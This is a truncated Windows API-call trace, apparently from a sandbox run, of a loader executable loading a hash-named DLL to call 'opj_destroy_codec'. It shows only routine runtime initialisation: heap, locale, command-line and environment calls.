[0155.824] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x30) returned 0x584580 [0155.824] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x36) returned 0x585ab0 [0155.824] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x3c) returned 0x590d10 [0155.824] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x52) returned 0x589380 [0155.824] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x3c) returned 0x590040 [0155.824] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0xd6) returned 0x585610 [0155.824] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x2e) returned 0x5820d0 [0155.824] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x1e) returned 0x58b860 [0155.824] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x2c) returned 0x582110 [0155.824] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x54) returned 0x5895c0 [0155.824] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x52) returned 0x589440 [0155.824] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x24) returned 0x58b890 [0155.824] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x42) returned 0x5901d0 [0155.824] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x2c) returned 0x582150 [0155.824] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x44) returned 0x5904a0 [0155.824] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x24) returned 0x58b290 [0155.824] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x595060 | out: hHeap=0x580000) returned 1 [0155.824] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x1000) returned 0x594680 [0155.824] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff626f52580) returned 0x0 [0155.825] GetStartupInfoW (in: lpStartupInfo=0x14fea0 | out: lpStartupInfo=0x14fea0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0155.825] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_destroy_codec" [0155.825] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_destroy_codec", pNumArgs=0x14fe70 | out: pNumArgs=0x14fe70) returned 0x589770*="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" [0155.825] LoadLibraryW (lpLibFileName="C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll") returned 0x7ffc45e90000 [0155.829] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0155.829] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0155.829] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0155.829] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0155.829] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0155.829] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0155.830] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0155.830] GetProcessHeap () returned 0x580000 [0155.830] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0155.830] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0155.830] GetLastError () returned 0x0 [0155.830] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsGetValue") returned 0x7ffc5bfe3780 [0155.830] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0155.830] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x3c8) returned 0x595b10 [0155.831] SetLastError (dwErrCode=0x0) [0155.831] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x1200) returned 0x595ee0 [0155.832] GetStartupInfoW (in: lpStartupInfo=0x14f6f0 | out: lpStartupInfo=0x14f6f0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0155.832] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0155.832] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0155.832] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0155.832] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_destroy_codec" [0155.832] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_destroy_codec" [0155.833] GetACP () returned 0x4e4 [0155.833] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x228) returned 0x58aca0 [0155.833] IsValidCodePage (CodePage=0x4e4) returned 1 [0155.833] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f6b0 | out: lpCPInfo=0x14f6b0) returned 1 [0155.833] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14ef50 | out: lpCPInfo=0x14ef50) returned 1 [0155.833] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0155.833] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14eca0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿp") returned 256 [0155.833] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿp", cchSrc=256, lpCharType=0x14f270 | out: lpCharType=0x14f270) returned 1 [0155.833] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0155.833] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14ec40, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0155.833] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0155.833] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="LCMapStringEx") returned 0x7ffc5bfb5350 [0155.833] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0155.833] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14ea30, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0155.833] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f070, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ0\x0e\x91_ü\x7f", lpUsedDefaultChar=0x0) returned 256 [0155.833] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0155.833] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14ec40, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0155.833] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0155.834] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14ea30, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0155.834] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14f170, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0155.834] RtlInitializeSListHead (in: ListHead=0x7ffc45fcd4a0 | out: ListHead=0x7ffc45fcd4a0) [0155.834] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x1000) returned 0x5970f0 [0155.834] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14f540, nSize=0x105 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe")) returned 0x29 [0155.834] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x7ffc5ecd0000 [0155.834] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="AreFileApisANSI") returned 0x7ffc5ecf4820 [0155.834] AreFileApisANSI () returned 1 [0155.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0155.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", cchWideChar=-1, lpMultiByteStr=0x7ffc45fcd6c0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpUsedDefaultChar=0x0) returned 42 [0155.835] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0xcb) returned 0x584400 [0155.835] GetEnvironmentStringsW () returned 0x598100* [0155.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1254, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1254 [0155.835] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x4e6) returned 0x598ae0 [0155.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1254, lpMultiByteStr=0x598ae0, cbMultiByte=1254, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1254 [0155.835] FreeEnvironmentStringsW (penv=0x598100) returned 1 [0155.835] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x118) returned 0x589ff0 [0155.835] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x1f) returned 0x58b5c0 [0155.835] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x2e) returned 0x5898f0 [0155.835] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x31) returned 0x584fa0 [0155.835] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x3c) returned 0x5906d0 [0155.835] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x31) returned 0x584fe0 [0155.835] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x14) returned 0x589c20 [0155.835] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x24) returned 0x58b590 [0155.835] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0xd) returned 0x583fb0 [0155.835] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x1d) returned 0x58b920 [0155.835] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x31) returned 0x585020 [0155.835] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x15) returned 0x585060 [0155.835] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x17) returned 0x584090 [0155.835] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0xe) returned 0x5825f0 [0155.835] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x69) returned 0x583eb0 [0155.835] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x3e) returned 0x5905e0 [0155.835] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x1d) returned 0x58b380 [0155.835] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x48) returned 0x5909a0 [0155.835] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x12) returned 0x583f30 [0155.835] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x18) returned 0x583f50 [0155.835] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x1b) returned 0x58b7d0 [0155.835] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x1e) returned 0x58b5f0 [0155.835] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x29) returned 0x58ba20 [0155.835] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x1e) returned 0x58b620 [0155.836] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x6b) returned 0x58ba60 [0155.836] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x17) returned 0x583f70 [0155.836] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0xf) returned 0x58bae0 [0155.836] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x16) returned 0x588d00 [0155.836] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x2a) returned 0x5987d0 [0155.836] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x29) returned 0x598250 [0155.836] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x12) returned 0x588d20 [0155.836] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x21) returned 0x58b7a0 [0155.836] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x16) returned 0x599220 [0155.836] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x22) returned 0x58b350 [0155.836] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x12) returned 0x599300 [0155.836] HeapFree (in: hHeap=0x580000, 